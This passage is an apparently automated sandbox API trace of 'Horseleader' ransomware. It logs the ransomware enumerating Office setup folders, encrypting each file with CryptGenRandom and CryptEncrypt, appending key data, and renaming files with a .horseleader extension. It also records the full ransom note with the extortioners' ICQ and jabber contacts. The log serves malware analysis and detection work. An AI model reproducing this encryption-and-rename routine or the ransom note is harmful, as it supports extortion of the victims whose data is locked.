[0244.357] StrStrIW (lpFirst="AccessMUISet.XML", lpSrch=".horseleader") returned 0x0 [0244.357] lstrcmpW (lpString1="AccessMUISet.XML", lpString2="#Decrypt#.txt") returned 1 [0244.357] lstrcmpW (lpString1="AccessMUISet.XML", lpString2="_uninstalling_.png") returned 1 [0244.357] lstrlenW (lpString=".testttjffg") returned 11 [0244.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpSrch=".testttjffg") returned 0x0 [0244.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.358] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 113 [0244.359] StrStrW (lpFirst="AccessMUISet.XML", lpSrch=".txt") returned 0x0 [0244.359] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=819) returned 1 [0244.359] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.361] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.361] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.362] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.362] CloseHandle (hObject=0x15c) returned 1 [0244.362] GetProcessHeap () returned 0x780000 [0244.362] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.362] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.horseleader") returned 125 [0244.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.horseleader")) returned 1 [0244.363] GetProcessHeap () returned 0x780000 [0244.363] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.363] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.363] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.363] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 106 [0244.363] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.363] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.363] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.363] lstrlenW (lpString=".testttjffg") returned 11 [0244.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 106 [0244.365] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.365] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2624) returned 1 [0244.365] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0xa40, lpOverlapped=0x0) returned 1 [0244.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.367] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0xa40, lpOverlapped=0x0) returned 1 [0244.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.367] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.368] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.368] CloseHandle (hObject=0x15c) returned 1 [0244.368] GetProcessHeap () returned 0x780000 [0244.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.368] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.horseleader") returned 118 [0244.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.horseleader")) returned 1 [0244.369] GetProcessHeap () returned 0x780000 [0244.369] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.369] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.369] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.369] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\#Decrypt#.txt") returned 110 [0244.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.370] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.370] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.371] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.371] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.371] CloseHandle (hObject=0x1a4) returned 1 [0244.371] GetProcessHeap () returned 0x780000 [0244.371] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.371] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Excel.en-us", cAlternateFileName="EXCEL~1.EN-")) returned 1 [0244.371] lstrcmpiW (lpString1="Excel.en-us", lpString2="Windows") returned -1 [0244.371] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned 95 [0244.371] lstrcmpW (lpString1="Excel.en-us", lpString2=".") returned 1 [0244.371] lstrcmpW (lpString1="Excel.en-us", lpString2="..") returned 1 [0244.372] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.372] GetProcessHeap () returned 0x780000 [0244.372] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*") returned 97 [0244.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\.") returned 97 [0244.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.372] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\..") returned 98 [0244.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.372] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="ExcelMUI.XML", cAlternateFileName="")) returned 1 [0244.372] lstrcmpiW (lpString1="ExcelMUI.XML", lpString2="Windows") returned -1 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0244.372] StrStrIW (lpFirst="ExcelMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.373] lstrcmpW (lpString1="ExcelMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.373] lstrcmpW (lpString1="ExcelMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.373] lstrlenW (lpString=".testttjffg") returned 11 [0244.373] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.373] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.373] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0244.373] StrStrW (lpFirst="ExcelMUI.XML", lpSrch=".txt") returned 0x0 [0244.373] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1565) returned 1 [0244.373] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x61d, lpOverlapped=0x0) returned 1 [0244.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.375] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x61d, lpOverlapped=0x0) returned 1 [0244.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.376] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.376] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.376] CloseHandle (hObject=0x15c) returned 1 [0244.376] GetProcessHeap () returned 0x780000 [0244.376] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.376] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.horseleader") returned 120 [0244.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.horseleader")) returned 1 [0244.377] GetProcessHeap () returned 0x780000 [0244.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.377] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.377] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.377] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0244.377] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.377] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.377] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.377] lstrlenW (lpString=".testttjffg") returned 11 [0244.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0244.378] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.379] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2296) returned 1 [0244.379] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x8f8, lpOverlapped=0x0) returned 1 [0244.381] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.381] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x8f8, lpOverlapped=0x0) returned 1 [0244.381] SetFilePointerEx (in: 